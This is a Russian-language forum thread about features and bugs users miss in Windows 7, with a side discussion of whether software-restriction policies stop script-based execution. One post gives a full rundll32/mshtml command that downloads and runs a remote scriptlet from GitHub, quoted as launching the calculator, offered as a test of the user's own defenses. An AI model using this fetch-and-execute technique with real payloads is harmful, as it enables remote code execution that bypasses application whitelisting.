26

Re: OFF: Чего не хватает в Windows 7

Вот тут подробней и больше тестов:
https://github.com/api0cradle/UltimateA … ByPassList
Блог автора:
https://oddvar.moe/

27

Если бы я хорошо знал английский, то не спрашивал бы. Malcev, поясните своими словами, в чём заключается уязвимость. Что я должен сделать такого, чтобы случайно запустить вредоносный код? Я же сам не буду вручную запускать незнакомую библиотеку через rundll32.exe.

28 (изменено: Malcev, 2018-06-20 15:16:34)

Проверка запуска скриптов, эксешников, регистрации dll на вашей машине:
Например вбейте этот код в cmd и он создаст бекдоор, через который откроет у вас калькулятор:

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/3gstudent/Javascript-Backdoor/master/test")

Перед тем как запускать, проверьте, что находится по ссылке:
https://raw.githubusercontent.com/3gstu … aster/test
Должно быть:

<?xml version="1.0"?>

<package>
<component id="testCalc">

<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); 
]]>
</script>

</component>
</package>

29 (изменено: Malcev, 2018-06-20 15:36:37)

ypppu пишет:

Что я должен сделать такого, чтобы случайно запустить вредоносный код?

Повторюсь, ничего запускать не надо, достаточно просто зайти на заражённый сайт.
Можно, конечно, поискать в гугле либо на тематических форумах такие, но вы будете на них заходить и тестировать?
Лично у меня такого желания нет.
Вообще тут у автора много всяких разностей:
https://github.com/3gstudent?tab=repositories

30 (изменено: stealzy, 2018-06-20 16:44:57)

Malcev в тексте по вашей цитате говорится что использование против общих угроз - ок, опасаться нужно прицельного человеческого взлома.

Malcev пишет:

код из этих примеров

Примеры для AppLocker, а не SRP, кроме первой ссылки. Опять таки нужна уязвимость чего-то что бы просто их запустить.

Malcev пишет:

достаточно просто зайти на заражённый сайт

Ну нет, надо иметь старые версии java или flash плагинов, желательно чтобы плагины на странице загружались автоматически а не по запросу. Плагин загрузит .ехе во временную папку и попытается его запустить.

31

Malcev пишет:

Повторюсь, ничего запускать не надо, достаточно просто зайти на заражённый сайт.

Кто будет запускать rundll32.exe?

32 (изменено: Malcev, 2018-06-20 20:34:22)

stealzy пишет:

Примеры для AppLocker, а не SRP

С SRP такие номера не пройдут?

stealzy пишет:

Ну нет, надо иметь старые версии java или flash плагинов

Совсем необязательно, достаточно иметь неапгрейженый броузер и не отключить джаваскрипт (куда сейчас без него).

Атака с помощью скрытой загрузки
Скрытая загрузка — привычный метод распространения вредоносного ПО. Злоумышленники ищут незащищенные сайты и внедряют вредоносные скрипты в их HTTP- или PHP-код. Этот скрипт может установить вредоносное ПО напрямую на компьютер пользователя, посетившего сайт или создать IFRAME-форму, которая перенаправит жертву на сайт, контролируемый злоумышленниками.
Для успеха атаки жертве не нужно выполнять никаких действий: достаточно посетить зараженный ресурс.

alexii пишет:

Кто будет запускать rundll32.exe?

Исполняемый файл, который загрузит и запустит скрипт с зараженного сайта.

33 (изменено: alexii, 2018-06-20 21:03:35)

Malcev пишет:

Исполняемый файл,

Какой исполняемый файл? Откуда он возьмётся, и кто его запустит?

34

https://avatars.mds.yandex.net/get-yablogs/39006/VJXrhHGYx/orig

35 (изменено: stealzy, 2018-06-21 18:15:45)

Пользуясь случаем похвастаюсь почему я не переживаю о подобных вещах. Ключевым моментом во всех сценариях является запуск взломанным процессом другого процесса (payload). Но если запуск процессов находится под контролем...
https://s8.hostingkartinok.com/uploads/images/2018/06/a613720f556ff7be301ad3114768114a.png

Как видно единственным, что браузерам разрешено запускать, является группа "браузеры", куда в частности входят торрент-качалка и флеш.
Помимо этого браузеры входят в группу "Все приложения", которым разрешено запускать эксплорер, архиваторы, текстовые редакторы и медиа-просмотрщики. Поэтому проблем с открытием из меню загрузок браузера нет.
Любая попытка запустить что-то неразрешенное вызовет оповещение-вопрос от HIPS.
Можно заметить что в группу файлов "Веб-браузеры" они добавлены относительными путями, и при отсутсвии SRP браузер может запустить malware с именем firefox.exe, но для начала такой файл надо создать, а разрешения на тихое создание/изменение .exe файлов у браузера нет, так-то.

Malcev пишет:

достаточно иметь неапгрейженый броузер и не отключить джаваскрипт

Интересно, в реальности не встречал, надо бы найти и потестировать.

36

5. В стандартном просмотрщике картинок перестала работать GIF анимация. И сглаживание убрали.

37

У меня жесткие диски зазеркалены с помощью виндовса, но есть огромный минус, что когда зеркало ломается, то оповещение не приходит.
Проблему решил с помощью скрипта на автохотки:
http://forum.script-coding.com/viewtopi … 394#p80394

38

6. Перестали работать DOS-программы.
Можно пользоваться эмулятором, но он не работает с принтером.

39

7. Мастер сканирования теперь автоматически завершает работу после 1 сканирования. Приходится запускать его заново, выставлять настройки по-новому.

40

Сегодня я внезапно заметил, что в Win10 можно прокручивать неактивные окна колесом мыши. Я для этого использую скрипт, но оказывается, это уже есть в 10-ке. По-моему, изначально этой фишки не было — появилась с каким-то обновлением.

Но так или иначе, этого нет в 7-ке.

41 (изменено: Malcev, 2018-09-01 16:37:19)

Обнаружил неприятный баг семерки - неправильно определяет длительность некоторых видеофайлов, соответственно WMP также подхватывает неверную длительность при проигрывании и метод GetDetailsOf тоже.
На Win10 показывает правильно.
Кодек-паков не установлено.
Вначале грешил на кривую обработку ffmpeg, но недавно получил такой же глюк файла напрямую из камеры.
Например, этот файл на Win10 показывает длительность 00:00:17, а на семёрке 18:32:40.
https://ru.files.fm/f/fh4e3tzz

42

8. В Windows 7 уже нельзя размещать значки в папках так, как тебе удобно. Принудительно действуют опции "упорядочить автоматически" и "выровнять по сетке" (за исключением рабочего стола). В Windows XP она отключалась, а в Windows 7 уже нет.
Я где-то находил настройки для реестра. Они дают такой стиль отображения, при котором значки можно перетаскивать в произвольные координаты. Вроде бы называется "расширенная плитка". Но работает криво. Например перетащил текстовый файлик в удобное тебе место, отредактировал в Блокноте, нажал "Сохранить", и значок тут же перепрыгивает в левый верхний угол.

43

ypppu пишет:

5. В стандартном просмотрщике картинок перестала работать GIF анимация. И сглаживание убрали.

Это как так? Прислали вам обновление, где все поломали? Вроде в обновлениях одно время приходила Windows 10, наверное теперь оставшихся решили взять измором.
Стандартные блокнот, просмотрщик, медиаплеер и интернет-эксплорер программы конечно полезные, но требовать от них чего-либо жестоко.

ypppu пишет:

6. Перестали работать DOS-программы.

В ХР работали, а с висты уже нет — это имеется ввиду? Просто уже больше десяти лет прошло...
7. Мастер сканирования чего?

Malcev пишет:

Обнаружил неприятный баг семерки

У пользователи европейской N редакции семерки этого бага нет.
Полагаться на встроенные методы винды в динамичных сферах медиа и веб едва ли когда было надежным.
Мне вот в этом году написали баг-репорт когда код ComObjCreate("WinHttp.WinHttpRequest.5.1") выдавал ошибку в связи с отсутствием такого объекта в системе. Оказалось у человека стоит Windows 2003. Как-то мне в голову не пришло создать тему "Чего не хватает в Windows 2003", может еще не поздно ?

44

stealzy пишет:

Это как так? Прислали вам обновление, где все поломали?

Неприятность с просмотрщиком идёт в комплекте с семёркой. Сглаживание где-то нужно, где-то не нужно. Но если оно таки было в XP, то почему его искоренили в семёрке? Или сделать опциональным, или вообще не трогать.
А обрезание GIF анимации вообще уму не постижимо. Давайте сразу тогда выпилим блокнот, калькулятор и пр. мелочи и скажем: "Виндус - это только ОС. Приложения в базовую комплектацию не входят." Стандартные блокнот, просмотрщик и медиаплеер мне нравились в XP. Не вижу смысла лишать встроенную программу полезных функций.

stealzy пишет:

В ХР работали, а с висты уже нет — это имеется ввиду? Просто уже больше десяти лет прошло...

Может и с висты, я её не изучал подробно.

stealzy пишет:

7. Мастер сканирования чего?

Мастер работы со сканерами и камерами.

stealzy пишет:

"Чего не хватает в Windows 2003"

Я-то говорю про то хорошее, что было, но испортили. А не про то, чего появилось позднее.

45

stealzy, а какая у вас версия shell32.dll?
На других неапгрейженых версиях Win-7 у вас баг имеется?

stealzy пишет:

Полагаться на встроенные методы винды в динамичных сферах медиа и веб едва ли когда было надежным.

Проблема в том, что WMP криво воспроизводит такие файлы.
А многие пользователи пользуются именно им.

46 (изменено: stealzy, 2018-09-01 21:50:32)

ypppu пишет:

Виндус - это только ОС. Приложения в базовую комплектацию не входят.

Входят для галочки. Сравнить с базовой комплектацией mac os или стандартным набором из репозиториев любого линукса.

Malcev, увы, N редакция отличается от обычной только отсутствием WMP.

Malcev пишет:

Кодек-паков не установлено

Возможно какой-то кодек улучшит поддержку mts. mkv, webm без кодеков вовсе не воспроизводит, а flv этому плееру даже с ними не дастся.

47

stealzy, а у вас какой объект прописан в:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PropertySystem\PropertyHandlers\.mts

И к какой dll он принадлежит?
И если он принадлежит к mf.dll, то какая у mf.dll версия?

48

Данной ветки у меня нет. Само расширение .mts асоциировано с DaumPot плеером:

+ открыть спойлер

HKEY_CLASSES_ROOT\.MTS
HKEY_CLASSES_ROOT\.MTS, , PotPlayerMini64.MTS
HKEY_CLASSES_ROOT\CLSID\{4111111D-0313-11D1-B1AB-00AA00BA1158}\ProgID, , Mts.MtsGrp
HKEY_CLASSES_ROOT\Mts.MtsGrp
HKEY_CLASSES_ROOT\PotPlayerMini64.MTS
HKEY_CLASSES_ROOT\Wow6432Node\CLSID\{4111111D-0313-11D1-B1AB-00AA00BA1158}\ProgID, , Mts.MtsGrp
HKEY_CURRENT_USER\Software\Daum\PotPlayerMini64\FileIconList, 53, .MTS*Видео (MTS)*C:\Program Files\PotPlayer\PotIcons64.dll*78
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mts
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.mts\OpenWithProgids, PotPlayerMini64.MTS,
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.mts
HKEY_LOCAL_MACHINE\SOFTWARE\Clients\Media\PotPlayerMini64\Capabilities\FileAssociations, .MTS, PotPlayerMini64.MTS
HKEY_LOCAL_MACHINE\SOFTWARE\Clients\Media\PotPlayerMini64\Capabilities\FileAssociations, .MTS, PotPlayerMini64.MTS
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\KindMap, .mts, video
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Classes\CLSID\{4111111D-0313-11D1-B1AB-00AA00BA1158}\ProgID, , Mts.MtsGrp
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\Media\PotPlayerMini64\Capabilities\FileAssociations, .MTS, PotPlayerMini64.MTS
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Clients\Media\PotPlayerMini64\Capabilities\FileAssociations, .MTS, PotPlayerMini64.MTS
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\KindMap, .mts, video

49

Понятно, значит mf.dll глючит, потому как на win10 за отображение информации mts отвечает mfmpeg2srcsnk.dll.

50

Malcev пишет:

У меня жесткие диски зазеркалены с помощью виндовса

Это как?